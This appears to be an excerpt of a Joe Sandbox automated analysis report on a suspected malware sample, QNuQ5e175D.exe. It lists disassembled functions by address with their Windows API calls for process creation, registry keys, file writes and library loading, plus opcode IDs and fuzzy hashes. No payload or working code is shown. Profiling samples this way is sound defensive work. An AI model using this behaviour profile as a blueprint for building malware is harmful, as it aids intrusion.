                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                          • Instruction ID: 8c17455a9467dbb84b7eb3278e4b377a62f271589af7dc4cff81b1a675067d18
                                                          • Opcode Fuzzy Hash: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                          • Instruction Fuzzy Hash: 6CF06832A045219BDB10BBA5DA8E5AE62A5AB44354F11443FE502B71C1CAF84D02977D
                                                          Function 004056CF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004056DF
                                                            • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 0040572B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitialize
                                                          • String ID:
                                                          • API String ID: 2896919175-0
                                                          • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                          • Instruction ID: 52f38fc7938b2997ebb4afee836ba7d943988f66c47461a03c1f49ca59b4ab2d
                                                          • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                          • Instruction Fuzzy Hash: 2AF02E72400610DBE7016B94AD02BA373A8FBC53A5F05503EFF89B32E0CB3658018B5D
                                                          Function 00405ACB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                          • GetLastError.KERNEL32 ref: 00405B1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction ID: 83f907d2df1d2810bbbe2cf052e9f9ea9028798b61a5f10ffece60f544324ce8
                                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction Fuzzy Hash: 44F0F4B0D1060EDBDB00DFA4D6497EFBBB4AB04309F00812AD941B6281D7B89248CBA9
                                                          Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                          • Instruction ID: 14a8ef39102396d835bb54982d99b4aace68b6eedf0c4e81be07541ee7d8ceed
                                                          • Opcode Fuzzy Hash: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                          • Instruction Fuzzy Hash: FEE04F76908610DFE748EBA4AE499EEB3F4EF80365B20197FE001F11D1DBB94D00966D
                                                          Function 00405B5A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                          • Instruction ID: 1d4bd4e17b1592c090cadeee614c80d4297d43de2f88d62204b9ca700bb873e4
                                                          • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                          • Instruction Fuzzy Hash: C9E09AB4600219BFFB109B64AD06F7B767CE704604F408475BD15E6151D774A8158A78
                                                          Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                          • Instruction ID: 71f073bf0609ebb53fb67f9a0a806094daae3e6e017a449e2b81a31607f58fde
                                                          • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                          • Instruction Fuzzy Hash: AFE04F32B10514ABCB18CFA8FED08AE73A6EB44321310053FD502B36A4C675AD409B18
                                                          Function 0040696B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                            • Part of subcall function 004068FB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                            • Part of subcall function 004068FB: wsprintfW.USER32 ref: 0040694D
                                                            • Part of subcall function 004068FB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction ID: f16a4ad3e9102b165210d3f50f6adbe363033f5fe81171ed8a06a41b6d2757eb
                                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction Fuzzy Hash: F1E08673504311AAD6105B759D0492772E89F89750302443EF986F2140DB38EC32A6AE
                                                          Function 00406067 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                          Function 00405B25 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction ID: 2532c664264170c07cbc731aa09703a23e3881c092aaf3b019fc47175ec23a7b
                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction Fuzzy Hash: 98C04C70604906DAD7505F219F087177960AB50741F158439A6C7F40A0DA74A455D92D
                                                          Function 6FC42B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 6FC42C57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a187784c1da4ef079c53416b4b392d4c54fda07993d69d14cf429dd4dea015df
                                                          • Instruction ID: 93f43be41578cda5c141f8146d2bdd74878f3826116ca88e8f114323f9675895
                                                          • Opcode Fuzzy Hash: a187784c1da4ef079c53416b4b392d4c54fda07993d69d14cf429dd4dea015df
                                                          • Instruction Fuzzy Hash: E941A075500705DFDF24EF68D9A6BD97774FB46368F208C26EA05CA540EB38A49CCBA0
                                                          Function 004016A0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                          • Instruction ID: b5cd7fb0f8cac405fb011e9cf8ea0a60cc8dc6b6af2237c550085c2a5a912803
                                                          • Opcode Fuzzy Hash: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                          • Instruction Fuzzy Hash: 1DF0903160812293CB1077B55F0ED9F26A49F8137CB21063FB112B21E1D6BCC902926E
                                                          Function 004028B6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                          • Instruction ID: c79ba5cb2d88364bafa4f5c49a43b48020d8ed27846d342f9c81a2b2dcc73f01
                                                          • Opcode Fuzzy Hash: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                          • Instruction Fuzzy Hash: 9BE06D71904104ABDB00ABA5AE498FE73B9EB80355B20443FF101B04D4C77858109A2D
                                                          Function 00406412 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 0040643B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction ID: 173efcb61436e01de2ec3b268cd8b302251cd5bc368a703a1804e99dfb897165
                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction Fuzzy Hash: 51E0BF72010109BFEF095F60DD4AD7B3A1DE708610B11852EF906D5051E6B5A9705675
                                                          Function 00406119 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BD,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040612D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction ID: 5447fabf40714e60d37a3b8d529c829a5aab84dab7567664cea5a9789522ebfd
                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction Fuzzy Hash: DFE08C3221021ABBDF109E518C00EEB3B6CEB003A0F014432FD26E7050D630E86097A4
                                                          Function 004060EA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403507,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
